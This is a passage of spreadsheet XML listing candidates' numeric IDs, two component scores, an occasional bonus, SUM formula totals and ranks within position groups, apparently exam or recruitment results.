    </row>
    <row r="93" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A93" s="8" t="n">
        <v>4100036</v>
      </c>
      <c r="B93" s="8" t="n">
        <v>1314010605</v>
      </c>
      <c r="C93" s="8" t="s">
        <v>99</v>
      </c>
      <c r="D93" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E93" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="F93" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G93" s="8"/>
      <c r="H93" s="8" t="n">
        <f aca="false">SUM(E93:G93)</f>
        <v>117.4</v>
      </c>
      <c r="I93" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="94" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A94" s="8" t="n">
        <v>4100036</v>
      </c>
      <c r="B94" s="8" t="n">
        <v>1314010609</v>
      </c>
      <c r="C94" s="8" t="s">
        <v>99</v>
      </c>
      <c r="D94" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E94" s="8" t="n">
        <v>44.8</v>
      </c>
      <c r="F94" s="8" t="n">
        <v>53.8</v>
      </c>
      <c r="G94" s="8"/>
      <c r="H94" s="8" t="n">
        <f aca="false">SUM(E94:G94)</f>
        <v>98.6</v>
      </c>
      <c r="I94" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="95" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A95" s="8" t="n">
        <v>4100036</v>
      </c>
      <c r="B95" s="8" t="n">
        <v>1314010606</v>
      </c>
      <c r="C95" s="8" t="s">
        <v>99</v>
      </c>
      <c r="D95" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E95" s="8" t="n">
        <v>43</v>
      </c>
      <c r="F95" s="8" t="n">
        <v>52.4</v>
      </c>
      <c r="G95" s="8"/>
      <c r="H95" s="8" t="n">
        <f aca="false">SUM(E95:G95)</f>
        <v>95.4</v>
      </c>
      <c r="I95" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="96" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A96" s="8" t="n">
        <v>4100036</v>
      </c>
      <c r="B96" s="8" t="n">
        <v>1314010607</v>
      </c>
      <c r="C96" s="8" t="s">
        <v>99</v>
      </c>
      <c r="D96" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E96" s="8" t="n">
        <v>48</v>
      </c>
      <c r="F96" s="8" t="n">
        <v>41.2</v>
      </c>
      <c r="G96" s="8"/>
      <c r="H96" s="8" t="n">
        <f aca="false">SUM(E96:G96)</f>
        <v>89.2</v>
      </c>
      <c r="I96" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="97" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A97" s="8" t="n">
        <v>4100037</v>
      </c>
      <c r="B97" s="8" t="n">
        <v>1314010610</v>
      </c>
      <c r="C97" s="8" t="s">
        <v>100</v>
      </c>
      <c r="D97" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E97" s="8" t="n">
        <v>65.8</v>
      </c>
      <c r="F97" s="8" t="n">
        <v>63</v>
      </c>
      <c r="G97" s="8"/>
      <c r="H97" s="8" t="n">
        <f aca="false">SUM(E97:G97)</f>
        <v>128.8</v>
      </c>
      <c r="I97" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="98" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A98" s="8" t="n">
        <v>4100037</v>
      </c>
      <c r="B98" s="8" t="n">
        <v>1314010611</v>
      </c>
      <c r="C98" s="8" t="s">
        <v>100</v>
      </c>
      <c r="D98" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E98" s="8" t="n">
        <v>42</v>
      </c>
      <c r="F98" s="8" t="n">
        <v>47.6</v>
      </c>
      <c r="G98" s="8"/>
      <c r="H98" s="8" t="n">
        <f aca="false">SUM(E98:G98)</f>
        <v>89.6</v>
      </c>
      <c r="I98" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="99" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A99" s="8" t="n">
        <v>4100038</v>
      </c>
      <c r="B99" s="8" t="n">
        <v>1314010612</v>
      </c>
      <c r="C99" s="8" t="s">
        <v>101</v>
      </c>
      <c r="D99" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E99" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="F99" s="8" t="n">
        <v>67</v>
      </c>
      <c r="G99" s="8"/>
      <c r="H99" s="8" t="n">
        <f aca="false">SUM(E99:G99)</f>
        <v>122.4</v>
      </c>
      <c r="I99" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="100" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A100" s="8" t="n">
        <v>4100038</v>
      </c>
      <c r="B100" s="8" t="n">
        <v>1314010613</v>
      </c>
      <c r="C100" s="8" t="s">
        <v>101</v>
      </c>
      <c r="D100" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E100" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="F100" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="G100" s="8"/>
      <c r="H100" s="8" t="n">
        <f aca="false">SUM(E100:G100)</f>
        <v>112.6</v>
      </c>
      <c r="I100" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="101" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A101" s="8" t="n">
        <v>4100038</v>
      </c>
      <c r="B101" s="8" t="n">
        <v>1314010614</v>
      </c>
      <c r="C101" s="8" t="s">
        <v>101</v>
      </c>
      <c r="D101" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E101" s="8" t="n">
        <v>56</v>
      </c>
      <c r="F101" s="8" t="n">
        <v>48.2</v>
      </c>
      <c r="G101" s="8"/>
      <c r="H101" s="8" t="n">
        <f aca="false">SUM(E101:G101)</f>
        <v>104.2</v>
      </c>
      <c r="I101" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="102" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A102" s="8" t="n">
        <v>4100039</v>
      </c>
      <c r="B102" s="8" t="n">
        <v>1314010617</v>
      </c>
      <c r="C102" s="8" t="s">
        <v>102</v>
      </c>
      <c r="D102" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E102" s="8" t="n">
        <v>64.6</v>
      </c>
      <c r="F102" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="G102" s="8"/>
      <c r="H102" s="8" t="n">
        <f aca="false">SUM(E102:G102)</f>
        <v>124.2</v>
      </c>
      <c r="I102" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="103" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A103" s="8" t="n">
        <v>4100039</v>
      </c>
      <c r="B103" s="8" t="n">
        <v>1314010616</v>
      </c>
      <c r="C103" s="8" t="s">
        <v>102</v>
      </c>
      <c r="D103" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E103" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="F103" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="G103" s="8"/>
      <c r="H103" s="8" t="n">
        <f aca="false">SUM(E103:G103)</f>
        <v>116.2</v>
      </c>
      <c r="I103" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="104" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A104" s="8" t="n">
        <v>4100039</v>
      </c>
      <c r="B104" s="8" t="n">
        <v>1314010618</v>
      </c>
      <c r="C104" s="8" t="s">
        <v>102</v>
      </c>
      <c r="D104" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E104" s="8" t="n">
        <v>51</v>
      </c>
      <c r="F104" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G104" s="8"/>
      <c r="H104" s="8" t="n">
        <f aca="false">SUM(E104:G104)</f>
        <v>115</v>
      </c>
      <c r="I104" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="105" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A105" s="8" t="n">
        <v>4100039</v>
      </c>
      <c r="B105" s="8" t="n">
        <v>1314010615</v>
      </c>
      <c r="C105" s="8" t="s">
        <v>102</v>
      </c>
      <c r="D105" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E105" s="8" t="n">
        <v>60</v>
      </c>
      <c r="F105" s="8" t="n">
        <v>49.8</v>
      </c>
      <c r="G105" s="8"/>
      <c r="H105" s="8" t="n">
        <f aca="false">SUM(E105:G105)</f>
        <v>109.8</v>
      </c>
      <c r="I105" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="106" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A106" s="8" t="n">
        <v>4100039</v>
      </c>
      <c r="B106" s="8" t="n">
        <v>1314010619</v>
      </c>
      <c r="C106" s="8" t="s">
        <v>102</v>
      </c>
      <c r="D106" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E106" s="8" t="n">
        <v>40.6</v>
      </c>
      <c r="F106" s="8" t="n">
        <v>53.6</v>
      </c>
      <c r="G106" s="8"/>
      <c r="H106" s="8" t="n">
        <f aca="false">SUM(E106:G106)</f>
        <v>94.2</v>
      </c>
      <c r="I106" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="107" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A107" s="8" t="n">
        <v>4100039</v>
      </c>
      <c r="B107" s="8" t="n">
        <v>1314010620</v>
      </c>
      <c r="C107" s="8" t="s">
        <v>102</v>
      </c>
      <c r="D107" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E107" s="8" t="n">
        <v>38</v>
      </c>
      <c r="F107" s="8" t="n">
        <v>53</v>
      </c>
      <c r="G107" s="8"/>
      <c r="H107" s="8" t="n">
        <f aca="false">SUM(E107:G107)</f>
        <v>91</v>
      </c>
      <c r="I107" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="108" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A108" s="8" t="n">
        <v>4100040</v>
      </c>
      <c r="B108" s="8" t="n">
        <v>1314010622</v>
      </c>
      <c r="C108" s="8" t="s">
        <v>103</v>
      </c>
      <c r="D108" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E108" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="F108" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="G108" s="8"/>
      <c r="H108" s="8" t="n">
        <f aca="false">SUM(E108:G108)</f>
        <v>116</v>
      </c>
      <c r="I108" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="109" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A109" s="8" t="n">
        <v>4100040</v>
      </c>
      <c r="B109" s="8" t="n">
        <v>1314010623</v>
      </c>
      <c r="C109" s="8" t="s">
        <v>103</v>
      </c>
      <c r="D109" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E109" s="8" t="n">
        <v>46.2</v>
      </c>
      <c r="F109" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="G109" s="8"/>
      <c r="H109" s="8" t="n">
        <f aca="false">SUM(E109:G109)</f>
        <v>101</v>
      </c>
      <c r="I109" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="110" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A110" s="8" t="n">
        <v>4100040</v>
      </c>
      <c r="B110" s="8" t="n">
        <v>1314010621</v>
      </c>
      <c r="C110" s="8" t="s">
        <v>103</v>
      </c>
      <c r="D110" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E110" s="8" t="n">
        <v>57</v>
      </c>
      <c r="F110" s="8" t="n">
        <v>43.2</v>
      </c>
      <c r="G110" s="8"/>
      <c r="H110" s="8" t="n">
        <f aca="false">SUM(E110:G110)</f>
        <v>100.2</v>
      </c>
      <c r="I110" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="111" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A111" s="8" t="n">
        <v>4100041</v>
      </c>
      <c r="B111" s="8" t="n">
        <v>1314010625</v>
      </c>
      <c r="C111" s="8" t="s">
        <v>104</v>
      </c>
      <c r="D111" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E111" s="8" t="n">
        <v>44.8</v>
      </c>
      <c r="F111" s="8" t="n">
        <v>48.8</v>
      </c>
      <c r="G111" s="8"/>
      <c r="H111" s="8" t="n">
        <f aca="false">SUM(E111:G111)</f>
        <v>93.6</v>
      </c>
      <c r="I111" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="112" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A112" s="8" t="n">
        <v>4100041</v>
      </c>
      <c r="B112" s="8" t="n">
        <v>1314010626</v>
      </c>
      <c r="C112" s="8" t="s">
        <v>104</v>
      </c>
      <c r="D112" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E112" s="8" t="n">
        <v>37.8</v>
      </c>
      <c r="F112" s="8" t="n">
        <v>40</v>
      </c>
      <c r="G112" s="8"/>
      <c r="H112" s="8" t="n">
        <f aca="false">SUM(E112:G112)</f>
        <v>77.8</v>
      </c>
      <c r="I112" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="113" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A113" s="8" t="n">
        <v>4100041</v>
      </c>
      <c r="B113" s="8" t="n">
        <v>1314010624</v>
      </c>
      <c r="C113" s="8" t="s">
        <v>104</v>
      </c>
      <c r="D113" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E113" s="8" t="n">
        <v>32</v>
      </c>
      <c r="F113" s="8" t="n">
        <v>45.4</v>
      </c>
      <c r="G113" s="8"/>
      <c r="H113" s="8" t="n">
        <f aca="false">SUM(E113:G113)</f>
        <v>77.4</v>
      </c>
      <c r="I113" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="114" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A114" s="8" t="n">
        <v>4100042</v>
      </c>
      <c r="B114" s="8" t="n">
        <v>1314010628</v>
      </c>
      <c r="C114" s="8" t="s">
        <v>105</v>
      </c>
      <c r="D114" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E114" s="8" t="n">
        <v>67.6</v>
      </c>
      <c r="F114" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="G114" s="8"/>
      <c r="H114" s="8" t="n">
        <f aca="false">SUM(E114:G114)</f>
        <v>129.4</v>
      </c>
      <c r="I114" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="115" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A115" s="8" t="n">
        <v>4100042</v>
      </c>
      <c r="B115" s="8" t="n">
        <v>1314010627</v>
      </c>
      <c r="C115" s="8" t="s">
        <v>105</v>
      </c>
      <c r="D115" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E115" s="8" t="n">
        <v>56.8</v>
      </c>
      <c r="F115" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="G115" s="8"/>
      <c r="H115" s="8" t="n">
        <f aca="false">SUM(E115:G115)</f>
        <v>122.4</v>
      </c>
      <c r="I115" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="116" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A116" s="8" t="n">
        <v>4100042</v>
      </c>
      <c r="B116" s="8" t="n">
        <v>1314010630</v>
      </c>
      <c r="C116" s="8" t="s">
        <v>105</v>
      </c>
      <c r="D116" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E116" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F116" s="8" t="n">
        <v>63.8</v>
      </c>
      <c r="G116" s="8"/>
      <c r="H116" s="8" t="n">
        <f aca="false">SUM(E116:G116)</f>
        <v>122</v>
      </c>
      <c r="I116" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="117" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A117" s="8" t="n">
        <v>4100042</v>
      </c>
      <c r="B117" s="8" t="n">
        <v>1314012502</v>
      </c>
      <c r="C117" s="8" t="s">
        <v>105</v>
      </c>
      <c r="D117" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E117" s="8" t="n">
        <v>51.8</v>
      </c>
      <c r="F117" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="G117" s="8"/>
      <c r="H117" s="8" t="n">
        <f aca="false">SUM(E117:G117)</f>
        <v>111.2</v>
      </c>
      <c r="I117" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="118" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A118" s="8" t="n">
        <v>4100042</v>
      </c>
      <c r="B118" s="8" t="n">
        <v>1314010629</v>
      </c>
      <c r="C118" s="8" t="s">
        <v>105</v>
      </c>
      <c r="D118" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E118" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="F118" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="G118" s="8"/>
      <c r="H118" s="8" t="n">
        <f aca="false">SUM(E118:G118)</f>
        <v>109.8</v>
      </c>
      <c r="I118" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="119" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A119" s="8" t="n">
        <v>4100042</v>
      </c>
      <c r="B119" s="8" t="n">
        <v>1314012503</v>
      </c>
      <c r="C119" s="8" t="s">
        <v>105</v>
      </c>
      <c r="D119" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E119" s="8" t="n">
        <v>42.2</v>
      </c>
      <c r="F119" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="G119" s="8"/>
      <c r="H119" s="8" t="n">
        <f aca="false">SUM(E119:G119)</f>
        <v>94.4</v>
      </c>
      <c r="I119" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="120" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A120" s="8" t="n">
        <v>4100042</v>
      </c>
      <c r="B120" s="8" t="n">
        <v>1314012501</v>
      </c>
      <c r="C120" s="8" t="s">
        <v>105</v>
      </c>
      <c r="D120" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E120" s="8" t="n">
        <v>44</v>
      </c>
      <c r="F120" s="8" t="n">
        <v>48.8</v>
      </c>
      <c r="G120" s="8"/>
      <c r="H120" s="8" t="n">
        <f aca="false">SUM(E120:G120)</f>
        <v>92.8</v>
      </c>
      <c r="I120" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="121" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A121" s="8" t="n">
        <v>4100042</v>
      </c>
      <c r="B121" s="8" t="n">
        <v>1314012504</v>
      </c>
      <c r="C121" s="8" t="s">
        <v>105</v>
      </c>
      <c r="D121" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E121" s="8" t="n">
        <v>34.2</v>
      </c>
      <c r="F121" s="8" t="n">
        <v>44.6</v>
      </c>
      <c r="G121" s="8"/>
      <c r="H121" s="8" t="n">
        <f aca="false">SUM(E121:G121)</f>
        <v>78.8</v>
      </c>
      <c r="I121" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="122" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A122" s="8" t="n">
        <v>4100043</v>
      </c>
      <c r="B122" s="8" t="n">
        <v>1314012505</v>
      </c>
      <c r="C122" s="8" t="s">
        <v>106</v>
      </c>
      <c r="D122" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E122" s="8" t="n">
        <v>68</v>
      </c>
      <c r="F122" s="8" t="n">
        <v>53</v>
      </c>
      <c r="G122" s="8"/>
      <c r="H122" s="8" t="n">
        <f aca="false">SUM(E122:G122)</f>
        <v>121</v>
      </c>
      <c r="I122" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="123" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A123" s="8" t="n">
        <v>4100043</v>
      </c>
      <c r="B123" s="8" t="n">
        <v>1314012506</v>
      </c>
      <c r="C123" s="8" t="s">
        <v>106</v>
      </c>
      <c r="D123" s="8" t="s">
        <v>97</v>
      </c>
      <c r="E123" s="8" t="n">
        <v>50.2</v>
      </c>
      <c r="F123" s="8" t="n">
        <v>55.6</v>
      </c>
      <c r="G123" s="8"/>
      <c r="H123" s="8" t="n">
        <f aca="false">SUM(E123:G123)</f>
        <v>105.8</v>
      </c>
      <c r="I123" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="124" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A124" s="8" t="n">
        <v>4101001</v>
      </c>
      <c r="B124" s="8" t="n">
        <v>1314010102</v>
      </c>
      <c r="C124" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D124" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E124" s="8" t="n">
        <v>78</v>
      </c>
      <c r="F124" s="8" t="n">
        <v>68.5</v>
      </c>
      <c r="G124" s="8"/>
      <c r="H124" s="8" t="n">
        <f aca="false">SUM(E124:G124)</f>
        <v>146.5</v>
      </c>
      <c r="I124" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="125" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A125" s="8" t="n">
        <v>4101001</v>
      </c>
      <c r="B125" s="8" t="n">
        <v>1314010103</v>
      </c>
      <c r="C125" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D125" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E125" s="8" t="n">
        <v>66.4</v>
      </c>
      <c r="F125" s="8" t="n">
        <v>65</v>
      </c>
      <c r="G125" s="8"/>
      <c r="H125" s="8" t="n">
        <f aca="false">SUM(E125:G125)</f>
        <v>131.4</v>
      </c>
      <c r="I125" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="126" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A126" s="8" t="n">
        <v>4101001</v>
      </c>
      <c r="B126" s="8" t="n">
        <v>1314010104</v>
      </c>
      <c r="C126" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D126" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E126" s="8" t="n">
        <v>58.4</v>
      </c>
      <c r="F126" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G126" s="8"/>
      <c r="H126" s="8" t="n">
        <f aca="false">SUM(E126:G126)</f>
        <v>122.4</v>
      </c>
      <c r="I126" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="127" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A127" s="8" t="n">
        <v>4101001</v>
      </c>
      <c r="B127" s="8" t="n">
        <v>1314010105</v>
      </c>
      <c r="C127" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D127" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E127" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="F127" s="8" t="n">
        <v>52.5</v>
      </c>
      <c r="G127" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H127" s="8" t="n">
        <f aca="false">SUM(E127:G127)</f>
        <v>122.1</v>
      </c>
      <c r="I127" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="128" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A128" s="8" t="n">
        <v>4101001</v>
      </c>
      <c r="B128" s="8" t="n">
        <v>1314010101</v>
      </c>
      <c r="C128" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D128" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E128" s="8" t="n">
        <v>54.4</v>
      </c>
      <c r="F128" s="8" t="n">
        <v>63</v>
      </c>
      <c r="G128" s="8"/>
      <c r="H128" s="8" t="n">
        <f aca="false">SUM(E128:G128)</f>
        <v>117.4</v>
      </c>
      <c r="I128" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="129" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A129" s="8" t="n">
        <v>4101017</v>
      </c>
      <c r="B129" s="8" t="n">
        <v>1314010107</v>
      </c>
      <c r="C129" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D129" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E129" s="8" t="n">
        <v>69.4</v>
      </c>
      <c r="F129" s="8" t="n">
        <v>67.5</v>
      </c>
      <c r="G129" s="8"/>
      <c r="H129" s="8" t="n">
        <f aca="false">SUM(E129:G129)</f>
        <v>136.9</v>
      </c>
      <c r="I129" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="130" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A130" s="8" t="n">
        <v>4101017</v>
      </c>
      <c r="B130" s="8" t="n">
        <v>1314010110</v>
      </c>
      <c r="C130" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D130" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E130" s="8" t="n">
        <v>63.8</v>
      </c>
      <c r="F130" s="8" t="n">
        <v>73</v>
      </c>
      <c r="G130" s="8"/>
      <c r="H130" s="8" t="n">
        <f aca="false">SUM(E130:G130)</f>
        <v>136.8</v>
      </c>
      <c r="I130" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="131" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A131" s="8" t="n">
        <v>4101017</v>
      </c>
      <c r="B131" s="8" t="n">
        <v>1314010108</v>
      </c>
      <c r="C131" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D131" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E131" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="F131" s="8" t="n">
        <v>72.5</v>
      </c>
      <c r="G131" s="8"/>
      <c r="H131" s="8" t="n">
        <f aca="false">SUM(E131:G131)</f>
        <v>132.1</v>
      </c>
      <c r="I131" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="132" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A132" s="8" t="n">
        <v>4101017</v>
      </c>
      <c r="B132" s="8" t="n">
        <v>1314010112</v>
      </c>
      <c r="C132" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D132" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E132" s="8" t="n">
        <v>73</v>
      </c>
      <c r="F132" s="8" t="n">
        <v>55</v>
      </c>
      <c r="G132" s="8"/>
      <c r="H132" s="8" t="n">
        <f aca="false">SUM(E132:G132)</f>
        <v>128</v>
      </c>
      <c r="I132" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="133" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A133" s="8" t="n">
        <v>4101017</v>
      </c>
      <c r="B133" s="8" t="n">
        <v>1314010114</v>
      </c>
      <c r="C133" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D133" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E133" s="8" t="n">
        <v>54.4</v>
      </c>
      <c r="F133" s="8" t="n">
        <v>70</v>
      </c>
      <c r="G133" s="8"/>
      <c r="H133" s="8" t="n">
        <f aca="false">SUM(E133:G133)</f>
        <v>124.4</v>
      </c>
      <c r="I133" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="134" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A134" s="8" t="n">
        <v>4101017</v>
      </c>
      <c r="B134" s="8" t="n">
        <v>1314010109</v>
      </c>
      <c r="C134" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D134" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E134" s="8" t="n">
        <v>60</v>
      </c>
      <c r="F134" s="8" t="n">
        <v>62.5</v>
      </c>
      <c r="G134" s="8"/>
      <c r="H134" s="8" t="n">
        <f aca="false">SUM(E134:G134)</f>
        <v>122.5</v>
      </c>
      <c r="I134" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="135" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A135" s="8" t="n">
        <v>4101017</v>
      </c>
      <c r="B135" s="8" t="n">
        <v>1314010106</v>
      </c>
      <c r="C135" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D135" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E135" s="8" t="n">
        <v>56.2</v>
      </c>
      <c r="F135" s="8" t="n">
        <v>63</v>
      </c>
      <c r="G135" s="8"/>
